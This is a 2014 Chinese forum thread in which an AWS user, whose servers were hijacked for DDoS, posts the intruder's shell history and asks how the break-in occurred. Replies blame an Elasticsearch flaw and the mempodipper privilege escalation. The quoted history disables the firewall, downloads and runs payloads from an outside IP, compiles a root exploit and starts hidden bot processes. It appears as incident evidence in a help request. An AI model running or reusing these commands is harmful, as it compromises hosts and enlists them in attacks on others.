服务器被当成DDOS发送机器了,大家麻烦看看是怎么入侵的?

AkataMoKa 发布于 2014/07/10 00:19
阅读 1K+
收藏 0

用的是 AWS 机器,用的是密匙登录的

今天接到他们的通知说被滥用成为DDOS攻击机器

有两台机器中招,一台看不到历史,另外一台显示的是:

/etc/init.d/iptables stop
chmod 0775 /usr/bin/nohup
chmod 0775 /usr/bin/killall
chmod 0775 /usr/bin/rm
chmod 0775 /usr/bin/wget
mkdir /etc/plngius
killall .Linux_time_y_2014
rm -r -f /etc/plngius/.Linux_time_y_2014
wget -O /etc/plngius/.Linux_time_y_2014 http://119.1.109.43:4443/txma
chmod 0755 /etc/plngius/.Linux_time_y_2014
nohup /etc/plngius/.Linux_time_y_2014 > /dev/null 2>&1 &
killall .Linux_time_y_2015
rm -r -f /tmp/.Linux_time_y_2015
wget -O /tmp/.Linux_time_y_2015 http://119.1.109.43:4443/xudp
chmod 0755 /tmp/.Linux_time_y_2015
nohup /tmp/.Linux_time_y_2015> /dev/null 2>&1 &
exit
/etc/init.d/iptables stop
/etc/init.d/iptable stop
chkconfig iptables off
service iptables stop
chmod 0775 /usr/bin/nohup
chmod 0775 /usr/bin/killall
chmod 0775 /usr/bin/rm
chmod 0775 /usr/bin/wget
wget -O /tmp/mempodipper.c http://119.1.109.43:4443/mempodipper.c
cc /tmp/mempodipper.c
./tmp/a.out
wget -O /tmp/32.out http://119.1.109.43:4443/2632.out
./tmp/32.out
mkdir /etc/plngius
killall .Linux_time_y_2014
rm -r -f /etc/plngius/.Linux_time_y_2014
wget -O /etc/plngius/.Linux_time_y_2014 http://119.1.109.43:4443/txma
chmod 0755 /etc/plngius/.Linux_time_y_2014
nohup /etc/plngius/.Linux_time_y_2014 > /dev/null 2>&1 &
killall .Linux_time_y_2015
rm -r -f /tmp/.Linux_time_y_2015
wget -O /tmp/.Linux_time_y_2015 http://119.1.109.43:4443/xudp
chmod 0755 /tmp/.Linux_time_y_2015
nohup /tmp/.Linux_time_y_2015> /dev/null 2>&1 &

还有就是很奇怪,为什么看不到最后一次登录的IP地址和时间?

加载中
0
大王叫我来卖萌
大王叫我来卖萌
这么巧,今天@乌云 被DDOS了。。
AkataMoKa
AkataMoKa
@乌云 他们就解释是什么原因吗?
0
AkataMoKa
AkataMoKa

我查到似乎是一个 ES 的远程攻击漏洞

刚好这两个机器都在跑 ES

0
淡定的wo
淡定的wo

都被骇客进入系统了。看不看历史记录都没用。

一定要做好应用程序或Web服务器与系统之间的权限隔离。请专业SA来处理吧!

0
自由之信
自由之信
汗,什么都看不懂,看来以后要转行去做安全了,这不懂安全,不行啊......
0
JerryLin
JerryLin
ES 是什么权限在跑, mempodipper 本地提权是12年的,服务器没有打补丁?
AkataMoKa
AkataMoKa
是普通用户跑的
返回顶部
顶部